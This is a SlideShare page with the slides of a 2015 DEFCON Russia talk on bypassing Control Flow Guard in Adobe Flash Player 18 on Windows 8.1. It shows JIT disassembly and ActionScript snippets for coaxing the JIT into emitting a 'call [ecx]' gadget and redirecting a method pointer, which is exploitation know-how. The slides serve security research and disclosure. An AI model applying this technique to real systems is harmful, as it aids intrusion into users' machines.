SlideShare a Scribd company logo

Advanced cfg bypass on adobe flash player 18 defcon russia 23

DefconRussia
DefconRussia

defcon russia 23

Technology
1 of 22
Download to read offline
Saint Petersburg 2015 Advanced CFG Bypass on Adobe Flash Player 18 and Windows 8.1 Yurii Drozdov Liudmila Drozdova Center of Vulnerability Research DEFCON Russia (DCG# 7812)
Background  CFG (Control Flow Guard) – indirect call validation  Detailed CFG description in many sources  Adobe Flash Player CFG sinceWindows 8.1 update 3  Adobe Flash CFG Bypass before June 2015– CoreSecurity  After June 2015 – this research
Experimental class class ExploitClass { function func1(arg1, arg2, … , argn) { func2(arg1, arg2, …, argn); } function func2(arg1, arg2, … , argn) { func3(arg1, arg2, …, argn ) } function func3(arg1, arg2, … , argn) { ... } } All methods of ExploitClass will be compiled by JIT compiler in machine code
JIT-generated function call from JIT code (func1 calls func2) 56 push esi 50 push eax 51 push ecx 8bc8 mov ecx,eax b840aa0f77 mov eax, LdrpValidateUserCallTarget (770faa40) ffd0 call eax -> CFG check 59 pop ecx 58 pop eax ffd0 call eax -> call of validated function (func2) 83c410 add esp,10h
Saving parameters in JIT code for JIT function Instructions, which are used for saving parameters can look like this 8b5de0 mov ebx,dword ptr [ebp-20h] 897d88 mov dword ptr [ebp-78h],edi 8b7de8 mov edi,dword ptr [ebp-18h] 89758c mov dword ptr [ebp-74h],esi or this 8bbde8feffff mov edi,dword ptr [ebp-118h] 898df4feffff mov dword ptr [ebp-10Ch],ecx 8b8decfeffff mov ecx,dword ptr [ebp-114h] 89b5c0feffff mov dword ptr [ebp-140h],esi Different opcodes!
Key points  Usage one of the parameters of func2 as controlled address  Arguments are in stack in original state  Arguments sometimes can be duplicated in registers  One of argument can be saved in ecx  We can find and change func2 pointer in ExploitClass object  We can transfer control to any part of JIT function  CFGBitmap for allocated by NtAllocVirtualMemory executable memory (JIT memory) has all‘1’ bits.  Transfer control to EIP-change instruction in JIT code– in our case ecx-control-transfer instruction
CALL ECX generation in func2 In JIT code call ecx doesn't exist normally, but we can try to generate it via:  one big instruction  two separate ones. Call ecx opcode is FF D1. We found following options in our experimental module 1. 33FF XOR EDI,EDI D1F8 SAR EAX,1 2. 8B8D 04FFFFFF MOV ECX,DWORD PTR [EBP-FC] D1E1 SHL ECX,1 3. 898D 70FFFFFF MOV DWORD PTR [EBP-90],ECX D1EB SHR EBX,1 4. 8D51 FF LEA EDX,DWORD PTR DS:[ECX-1] D1FE SAR ESI,1 5. C785 00FFFFFF D1000000 MOV DWORD PTR [EBP-100],0D1 2,3,5 – Looks like parameter saving code in JIT
Instructions with different opcodes for saving parameters in JIT code  Different instructions can be used for saving parameters. For example  C785 00FFFFFF 01000000 MOV DWORD PTR [EBP-100],1  C745 8C 01000000 MOV DWORD PTR [EBP-74],1  If in the instruction  MOV DWORD PTR [EBP-X], N  X> 0x80, first variant will be generated  X<= 0x80, second one will be generated
How to force Flash to use ‘proper’ parameter saving code ?  MOV DWORD PTR [EBP-X], N  X> 0x80, first variant will be generated  X<= 0x80, second one will be generated  We can influence on X in JIT function via local variables, number of other functions calls inside JIT function, number of their parameters.  We need to prepare func2 before call of func3 and force flash to use fist variant of opcode  We added more local variables, additional calls etc.
MOV DWORD PTR [EBP-X],0D1h Attempt function func2(arg1, arg2,...,argn) { var localvar1; var localvar2; .... func3(arg1, arg2,...,0xD1,..., argn ) } Result MOV EBX,18C731Eh XOR EBX,18C73CFh ; EBX == 0D1h MOV DWORD PTR [EBP-X],EBX Instead of MOV DWORD PTR [EBP-X],0D1h Fail 
Alternative generation of call ecx Using of two instructions 898D 70FFFFFF MOV DWORD PTR [EBP-90],ECX D1EB SHR/SHL/… EBX,1 Attempt was any_var1 = any_var2<<1 But instead of desired D1E2 SHL EDX,1 we got the same instruction, but with alternative opcode (probably because it is easier to generate it). C1 E2 01 SHL EDX, 1 Fail again 
Alternative  Call [ecx] with opcode FF 11 is alternative  Let’s try to get MOV DWORD PTR [EBP-X],11h
MOV DWORD PTR [EBP-X],11h Attempt function func2(arg1, arg2 ..., argn) { var localvar1; var localvar2; .... func3(arg1, arg2,...,0x11,... , argn) } Result c78570ffffff11000000 mov dword ptr [ebp-90h],11h Bingo! 
Number obfuscation in JIT Why we got c78570ffffff11000000 mov dword ptr [ebp-90h],11h ? 0x11 is not big number for JIT compiler and shouldn't be obfuscated. Obfuscation of numbers begins from 0x80. Numbers less than 0x80 will not be obfuscated.
Call to controlled address  After generation of JIT func2, we have ready call [ecx].  After exploit execution we can find address of func2 inside our object and change it to call [ecx] 's address in func2.  After all manipulations after call func2 from func1 we will have transfer control to controlled address inside ecx with CFG bypass.  126aed07 ff11 call dword ptr [ecx] ds:002b:42424242=????????
CFG Bypass
Links  http://sjc1-te-ftp.trendmicro.com/assets/wp/exploring- control-flow-guard-in-windows10.pdf  http://www.powerofcommunity.net/poc2014/mj0011.pdf  https://blog.coresecurity.com/2015/03/25/exploiting- cve-2015-0311-part-ii-bypassing-control-flow-guard-on- windows-8-1-update-3/  http://cvr-data.blogspot.ru/2015/07/advanced-cfg-bypass- on-adobe-flash.html  https://helpx.adobe.com/security/products/flash- player/apsb15-11.html
Advanced cfg bypass on adobe flash player 18 defcon russia 23

Recommended

Zn task - defcon russia 20
Zn task - defcon russia 20Zn task - defcon russia 20
Zn task - defcon russia 20
DefconRussia
 
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-one
DefconRussia
 
Specializing the Data Path - Hooking into the Linux Network Stack
Specializing the Data Path - Hooking into the Linux Network StackSpecializing the Data Path - Hooking into the Linux Network Stack
Specializing the Data Path - Hooking into the Linux Network Stack
Kernel TLV
 
Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20
DefconRussia
 
from Binary to Binary: How Qemu Works
from Binary to Binary: How Qemu Worksfrom Binary to Binary: How Qemu Works
from Binary to Binary: How Qemu Works
Zhen Wei
 
20141106 asfws unicode_hacks
20141106 asfws unicode_hacks20141106 asfws unicode_hacks
20141106 asfws unicode_hacks
Cyber Security Alliance
 
[嵌入式系統] MCS-51 實驗 - 使用 IAR (2)
[嵌入式系統] MCS-51 實驗 - 使用 IAR (2)[嵌入式系統] MCS-51 實驗 - 使用 IAR (2)
[嵌入式系統] MCS-51 實驗 - 使用 IAR (2)
Simen Li
 
SFO15-202: Towards Multi-Threaded Tiny Code Generator (TCG) in QEMU
SFO15-202: Towards Multi-Threaded Tiny Code Generator (TCG) in QEMUSFO15-202: Towards Multi-Threaded Tiny Code Generator (TCG) in QEMU
SFO15-202: Towards Multi-Threaded Tiny Code Generator (TCG) in QEMU
Linaro
 

Recommended

Zn task - defcon russia 20
Zn task - defcon russia 20Zn task - defcon russia 20
Zn task - defcon russia 20
DefconRussia
 
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-one
DefconRussia
 
Specializing the Data Path - Hooking into the Linux Network Stack
Specializing the Data Path - Hooking into the Linux Network StackSpecializing the Data Path - Hooking into the Linux Network Stack
Specializing the Data Path - Hooking into the Linux Network Stack
Kernel TLV
 
Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20
DefconRussia
 
from Binary to Binary: How Qemu Works
from Binary to Binary: How Qemu Worksfrom Binary to Binary: How Qemu Works
from Binary to Binary: How Qemu Works
Zhen Wei
 
20141106 asfws unicode_hacks
20141106 asfws unicode_hacks20141106 asfws unicode_hacks
20141106 asfws unicode_hacks
Cyber Security Alliance
 
[嵌入式系統] MCS-51 實驗 - 使用 IAR (2)
[嵌入式系統] MCS-51 實驗 - 使用 IAR (2)[嵌入式系統] MCS-51 實驗 - 使用 IAR (2)
[嵌入式系統] MCS-51 實驗 - 使用 IAR (2)
Simen Li
 
SFO15-202: Towards Multi-Threaded Tiny Code Generator (TCG) in QEMU
SFO15-202: Towards Multi-Threaded Tiny Code Generator (TCG) in QEMUSFO15-202: Towards Multi-Threaded Tiny Code Generator (TCG) in QEMU
SFO15-202: Towards Multi-Threaded Tiny Code Generator (TCG) in QEMU
Linaro
 
Offline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setupOffline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setup
Cyber Security Alliance
 
Linux Timer device driver
Linux Timer device driverLinux Timer device driver
Linux Timer device driver
艾鍗科技
 
Qemu JIT Code Generator and System Emulation
Qemu JIT Code Generator and System EmulationQemu JIT Code Generator and System Emulation
Qemu JIT Code Generator and System Emulation
National Cheng Kung University
 
Cs423 raw sockets_bw
Cs423 raw sockets_bwCs423 raw sockets_bw
Cs423 raw sockets_bw
jktjpc
 
[ZigBee 嵌入式系統] ZigBee 應用實作 - 使用 TI Z-Stack Firmware
[ZigBee 嵌入式系統] ZigBee 應用實作 - 使用 TI Z-Stack Firmware[ZigBee 嵌入式系統] ZigBee 應用實作 - 使用 TI Z-Stack Firmware
[ZigBee 嵌入式系統] ZigBee 應用實作 - 使用 TI Z-Stack Firmware
Simen Li
 
Pythonによるカスタム可能な高位設計技術 (Design Solution Forum 2016@新横浜)
Pythonによるカスタム可能な高位設計技術 (Design Solution Forum 2016@新横浜)Pythonによるカスタム可能な高位設計技術 (Design Solution Forum 2016@新横浜)
Pythonによるカスタム可能な高位設計技術 (Design Solution Forum 2016@新横浜)
Shinya Takamaeda-Y
 
[嵌入式系統] MCS-51 實驗 - 使用 IAR (3)
[嵌入式系統] MCS-51 實驗 - 使用 IAR (3)[嵌入式系統] MCS-51 實驗 - 使用 IAR (3)
[嵌入式系統] MCS-51 實驗 - 使用 IAR (3)
Simen Li
 
深入淺出C語言
深入淺出C語言深入淺出C語言
深入淺出C語言
Simen Li
 
Embedded JavaScript
Embedded JavaScriptEmbedded JavaScript
Embedded JavaScript
Jens Siebert
 
Georgy Nosenko - An introduction to the use SMT solvers for software security
Georgy Nosenko - An introduction to the use SMT solvers for software securityGeorgy Nosenko - An introduction to the use SMT solvers for software security
Georgy Nosenko - An introduction to the use SMT solvers for software security
DefconRussia
 
QEMU - Binary Translation
QEMU - Binary Translation QEMU - Binary Translation
QEMU - Binary Translation
Jiann-Fuh Liaw
 
LINUX RS232程式設計
LINUX RS232程式設計LINUX RS232程式設計
LINUX RS232程式設計
艾鍗科技
 
Translation Cache Policies for Dynamic Binary Translation
Translation Cache Policies for Dynamic Binary TranslationTranslation Cache Policies for Dynamic Binary Translation
Translation Cache Policies for Dynamic Binary Translation
Saber Ferjani
 
Hacking the swisscom modem
Hacking the swisscom modemHacking the swisscom modem
Hacking the swisscom modem
Cyber Security Alliance
 
建構嵌入式Linux系統於SD Card
建構嵌入式Linux系統於SD Card建構嵌入式Linux系統於SD Card
建構嵌入式Linux系統於SD Card
艾鍗科技
 
Embedded TCP/IP stack for FreeRTOS
Embedded TCP/IP stack for FreeRTOSEmbedded TCP/IP stack for FreeRTOS
Embedded TCP/IP stack for FreeRTOS
艾鍗科技
 
W8_2: Inside the UoS Educational Processor
W8_2: Inside the UoS Educational ProcessorW8_2: Inside the UoS Educational Processor
W8_2: Inside the UoS Educational Processor
Daniel Roggen
 
Building Network Functions with eBPF & BCC
Building Network Functions with eBPF & BCCBuilding Network Functions with eBPF & BCC
Building Network Functions with eBPF & BCC
Kernel TLV
 
Semtex.c [CVE-2013-2094] - A Linux Privelege Escalation
Semtex.c [CVE-2013-2094] - A Linux Privelege EscalationSemtex.c [CVE-2013-2094] - A Linux Privelege Escalation
Semtex.c [CVE-2013-2094] - A Linux Privelege Escalation
Kernel TLV
 
SMP Implementation for OpenBSD/sgi [Japanese Edition]
SMP Implementation for OpenBSD/sgi [Japanese Edition]SMP Implementation for OpenBSD/sgi [Japanese Edition]
SMP Implementation for OpenBSD/sgi [Japanese Edition]
Takuya ASADA
 
Bare metal performance in Elixir
Bare metal performance in ElixirBare metal performance in Elixir
Bare metal performance in Elixir
Aaron Seigo
 
2.1 ### uVision Project, (C) Keil Software .docx
2.1 ### uVision Project, (C) Keil Software .docx2.1 ### uVision Project, (C) Keil Software .docx
2.1 ### uVision Project, (C) Keil Software .docx
tarifarmarie
 

More Related Content

What's hot

Cs423 raw sockets_bw
Cs423 raw sockets_bwCs423 raw sockets_bw
Cs423 raw sockets_bw
jktjpc
 
Georgy Nosenko - An introduction to the use SMT solvers for software security
Georgy Nosenko - An introduction to the use SMT solvers for software securityGeorgy Nosenko - An introduction to the use SMT solvers for software security
Georgy Nosenko - An introduction to the use SMT solvers for software security
DefconRussia
 
建構嵌入式Linux系統於SD Card
建構嵌入式Linux系統於SD Card建構嵌入式Linux系統於SD Card
建構嵌入式Linux系統於SD Card
艾鍗科技
 
Building Network Functions with eBPF & BCC
Building Network Functions with eBPF & BCCBuilding Network Functions with eBPF & BCC
Building Network Functions with eBPF & BCC
Kernel TLV
 

What's hot (20)

Offline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setupOffline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setup
 
Linux Timer device driver
Linux Timer device driverLinux Timer device driver
Linux Timer device driver
 
Qemu JIT Code Generator and System Emulation
Qemu JIT Code Generator and System EmulationQemu JIT Code Generator and System Emulation
Qemu JIT Code Generator and System Emulation
 
Cs423 raw sockets_bw
Cs423 raw sockets_bwCs423 raw sockets_bw
Cs423 raw sockets_bw
 
[ZigBee 嵌入式系統] ZigBee 應用實作 - 使用 TI Z-Stack Firmware
[ZigBee 嵌入式系統] ZigBee 應用實作 - 使用 TI Z-Stack Firmware[ZigBee 嵌入式系統] ZigBee 應用實作 - 使用 TI Z-Stack Firmware
[ZigBee 嵌入式系統] ZigBee 應用實作 - 使用 TI Z-Stack Firmware
 
Pythonによるカスタム可能な高位設計技術 (Design Solution Forum 2016@新横浜)
Pythonによるカスタム可能な高位設計技術 (Design Solution Forum 2016@新横浜)Pythonによるカスタム可能な高位設計技術 (Design Solution Forum 2016@新横浜)
Pythonによるカスタム可能な高位設計技術 (Design Solution Forum 2016@新横浜)
 
[嵌入式系統] MCS-51 實驗 - 使用 IAR (3)
[嵌入式系統] MCS-51 實驗 - 使用 IAR (3)[嵌入式系統] MCS-51 實驗 - 使用 IAR (3)
[嵌入式系統] MCS-51 實驗 - 使用 IAR (3)
 
深入淺出C語言
深入淺出C語言深入淺出C語言
深入淺出C語言
 
Embedded JavaScript
Embedded JavaScriptEmbedded JavaScript
Embedded JavaScript
 
Georgy Nosenko - An introduction to the use SMT solvers for software security
Georgy Nosenko - An introduction to the use SMT solvers for software securityGeorgy Nosenko - An introduction to the use SMT solvers for software security
Georgy Nosenko - An introduction to the use SMT solvers for software security
 
QEMU - Binary Translation
QEMU - Binary Translation QEMU - Binary Translation
QEMU - Binary Translation
 
LINUX RS232程式設計
LINUX RS232程式設計LINUX RS232程式設計
LINUX RS232程式設計
 
Translation Cache Policies for Dynamic Binary Translation
Translation Cache Policies for Dynamic Binary TranslationTranslation Cache Policies for Dynamic Binary Translation
Translation Cache Policies for Dynamic Binary Translation
 
Hacking the swisscom modem
Hacking the swisscom modemHacking the swisscom modem
Hacking the swisscom modem
 
建構嵌入式Linux系統於SD Card
建構嵌入式Linux系統於SD Card建構嵌入式Linux系統於SD Card
建構嵌入式Linux系統於SD Card
 
Embedded TCP/IP stack for FreeRTOS
Embedded TCP/IP stack for FreeRTOSEmbedded TCP/IP stack for FreeRTOS
Embedded TCP/IP stack for FreeRTOS
 
W8_2: Inside the UoS Educational Processor
W8_2: Inside the UoS Educational ProcessorW8_2: Inside the UoS Educational Processor
W8_2: Inside the UoS Educational Processor
 
Building Network Functions with eBPF & BCC
Building Network Functions with eBPF & BCCBuilding Network Functions with eBPF & BCC
Building Network Functions with eBPF & BCC
 
Semtex.c [CVE-2013-2094] - A Linux Privelege Escalation
Semtex.c [CVE-2013-2094] - A Linux Privelege EscalationSemtex.c [CVE-2013-2094] - A Linux Privelege Escalation
Semtex.c [CVE-2013-2094] - A Linux Privelege Escalation
 
SMP Implementation for OpenBSD/sgi [Japanese Edition]
SMP Implementation for OpenBSD/sgi [Japanese Edition]SMP Implementation for OpenBSD/sgi [Japanese Edition]
SMP Implementation for OpenBSD/sgi [Japanese Edition]
 

Similar to Advanced cfg bypass on adobe flash player 18 defcon russia 23

2.1 ### uVision Project, (C) Keil Software .docx
2.1 ### uVision Project, (C) Keil Software .docx2.1 ### uVision Project, (C) Keil Software .docx
2.1 ### uVision Project, (C) Keil Software .docx
tarifarmarie
 
Multiplatform JIT Code Generator for NetBSD by Alexander Nasonov
Multiplatform JIT Code Generator for NetBSD by Alexander NasonovMultiplatform JIT Code Generator for NetBSD by Alexander Nasonov
Multiplatform JIT Code Generator for NetBSD by Alexander Nasonov
eurobsdcon
 
Stranger in These Parts. A Hired Gun in the JS Corral (JSConf US 2012)
Stranger in These Parts. A Hired Gun in the JS Corral (JSConf US 2012)Stranger in These Parts. A Hired Gun in the JS Corral (JSConf US 2012)
Stranger in These Parts. A Hired Gun in the JS Corral (JSConf US 2012)
Igalia
 
20081114 Friday Food iLabt Bart Joris
20081114 Friday Food iLabt Bart Joris20081114 Friday Food iLabt Bart Joris
20081114 Friday Food iLabt Bart Joris
imec.archive
 

Similar to Advanced cfg bypass on adobe flash player 18 defcon russia 23 (20)

Bare metal performance in Elixir
Bare metal performance in ElixirBare metal performance in Elixir
Bare metal performance in Elixir
 
2.1 ### uVision Project, (C) Keil Software .docx
2.1 ### uVision Project, (C) Keil Software .docx2.1 ### uVision Project, (C) Keil Software .docx
2.1 ### uVision Project, (C) Keil Software .docx
 
Pragmatic Optimization in Modern Programming - Demystifying the Compiler
Pragmatic Optimization in Modern Programming - Demystifying the CompilerPragmatic Optimization in Modern Programming - Demystifying the Compiler
Pragmatic Optimization in Modern Programming - Demystifying the Compiler
 
Berkeley Packet Filters
Berkeley Packet FiltersBerkeley Packet Filters
Berkeley Packet Filters
 
Pragmatic Optimization in Modern Programming - Mastering Compiler Optimizations
Pragmatic Optimization in Modern Programming - Mastering Compiler OptimizationsPragmatic Optimization in Modern Programming - Mastering Compiler Optimizations
Pragmatic Optimization in Modern Programming - Mastering Compiler Optimizations
 
Challenges in GPU compilers
Challenges in GPU compilersChallenges in GPU compilers
Challenges in GPU compilers
 
Multiplatform JIT Code Generator for NetBSD by Alexander Nasonov
Multiplatform JIT Code Generator for NetBSD by Alexander NasonovMultiplatform JIT Code Generator for NetBSD by Alexander Nasonov
Multiplatform JIT Code Generator for NetBSD by Alexander Nasonov
 
Yurii Shevtsov "V8 + libuv = Node.js. Under the hood"
Yurii Shevtsov "V8 + libuv = Node.js. Under the hood"Yurii Shevtsov "V8 + libuv = Node.js. Under the hood"
Yurii Shevtsov "V8 + libuv = Node.js. Under the hood"
 
Stranger in These Parts. A Hired Gun in the JS Corral (JSConf US 2012)
Stranger in These Parts. A Hired Gun in the JS Corral (JSConf US 2012)Stranger in These Parts. A Hired Gun in the JS Corral (JSConf US 2012)
Stranger in These Parts. A Hired Gun in the JS Corral (JSConf US 2012)
 
Xdp and ebpf_maps
Xdp and ebpf_mapsXdp and ebpf_maps
Xdp and ebpf_maps
 
Demystify eBPF JIT Compiler
Demystify eBPF JIT CompilerDemystify eBPF JIT Compiler
Demystify eBPF JIT Compiler
 
Linux interrupts
Linux interruptsLinux interrupts
Linux interrupts
 
Embedded Recipes 2019 - Introduction to JTAG debugging
Embedded Recipes 2019 - Introduction to JTAG debuggingEmbedded Recipes 2019 - Introduction to JTAG debugging
Embedded Recipes 2019 - Introduction to JTAG debugging
 
Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]
Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]
Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]
 
OpenGL SC 2.0 Quick Reference
OpenGL SC 2.0 Quick ReferenceOpenGL SC 2.0 Quick Reference
OpenGL SC 2.0 Quick Reference
 
Alexander Reelsen - Seccomp for Developers
Alexander Reelsen - Seccomp for DevelopersAlexander Reelsen - Seccomp for Developers
Alexander Reelsen - Seccomp for Developers
 
20081114 Friday Food iLabt Bart Joris
20081114 Friday Food iLabt Bart Joris20081114 Friday Food iLabt Bart Joris
20081114 Friday Food iLabt Bart Joris
 
Micro c lab2(led patterns)
Micro c lab2(led patterns)Micro c lab2(led patterns)
Micro c lab2(led patterns)
 
PVS-Studio 5.00, a solution for developers of modern resource-intensive appl...
PVS-Studio 5.00, a solution for developers of modern resource-intensive appl...PVS-Studio 5.00, a solution for developers of modern resource-intensive appl...
PVS-Studio 5.00, a solution for developers of modern resource-intensive appl...
 
3D-DRESD Lorenzo Pavesi
3D-DRESD Lorenzo Pavesi3D-DRESD Lorenzo Pavesi
3D-DRESD Lorenzo Pavesi
 

More from DefconRussia

[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
DefconRussia
 
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC [DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
DefconRussia
 
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условияхSergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
DefconRussia
 
George Lagoda - Альтернативное использование вэб сервисов SharePoint со сторо...
George Lagoda - Альтернативное использование вэб сервисов SharePoint со сторо...George Lagoda - Альтернативное использование вэб сервисов SharePoint со сторо...
George Lagoda - Альтернативное использование вэб сервисов SharePoint со сторо...
DefconRussia
 

More from DefconRussia (20)

[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
 
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
 
[Defcon Russia #29] Алексей Тюрин - Spring autobinding
[Defcon Russia #29] Алексей Тюрин - Spring autobinding[Defcon Russia #29] Алексей Тюрин - Spring autobinding
[Defcon Russia #29] Алексей Тюрин - Spring autobinding
 
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
 
Георгий Зайцев - Reversing golang
Георгий Зайцев - Reversing golangГеоргий Зайцев - Reversing golang
Георгий Зайцев - Reversing golang
 
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC [DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
 
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacks
 
Attacks on tacacs - Алексей Тюрин
Attacks on tacacs - Алексей ТюринAttacks on tacacs - Алексей Тюрин
Attacks on tacacs - Алексей Тюрин
 
Weakpass - defcon russia 23
Weakpass - defcon russia 23Weakpass - defcon russia 23
Weakpass - defcon russia 23
 
nosymbols - defcon russia 20
nosymbols - defcon russia 20nosymbols - defcon russia 20
nosymbols - defcon russia 20
 
static - defcon russia 20
static - defcon russia 20static - defcon russia 20
static - defcon russia 20
 
Nedospasov defcon russia 23
Nedospasov defcon russia 23Nedospasov defcon russia 23
Nedospasov defcon russia 23
 
Miasm defcon russia 23
Miasm defcon russia 23Miasm defcon russia 23
Miasm defcon russia 23
 
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
 
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условияхSergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
 
George Lagoda - Альтернативное использование вэб сервисов SharePoint со сторо...
George Lagoda - Альтернативное использование вэб сервисов SharePoint со сторо...George Lagoda - Альтернативное использование вэб сервисов SharePoint со сторо...
George Lagoda - Альтернативное использование вэб сервисов SharePoint со сторо...
 
Taras Tatarinov - Применение аппаратных закладок pwnie express на примере реа...
Taras Tatarinov - Применение аппаратных закладок pwnie express на примере реа...Taras Tatarinov - Применение аппаратных закладок pwnie express на примере реа...
Taras Tatarinov - Применение аппаратных закладок pwnie express на примере реа...
 
Alexey Sintsov- SDLC - try me to implement
Alexey Sintsov- SDLC - try me to implementAlexey Sintsov- SDLC - try me to implement
Alexey Sintsov- SDLC - try me to implement
 
Anton Alexanenkov - Tor and Botnet C&C
Anton Alexanenkov - Tor and Botnet C&C Anton Alexanenkov - Tor and Botnet C&C
Anton Alexanenkov - Tor and Botnet C&C
 

Recently uploaded

Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Principled Technologies
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
Joaquim Jorge
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Miguel Araújo
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
Igalia
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Drew Madelung
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
sammart93
 

Recently uploaded (20)

Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
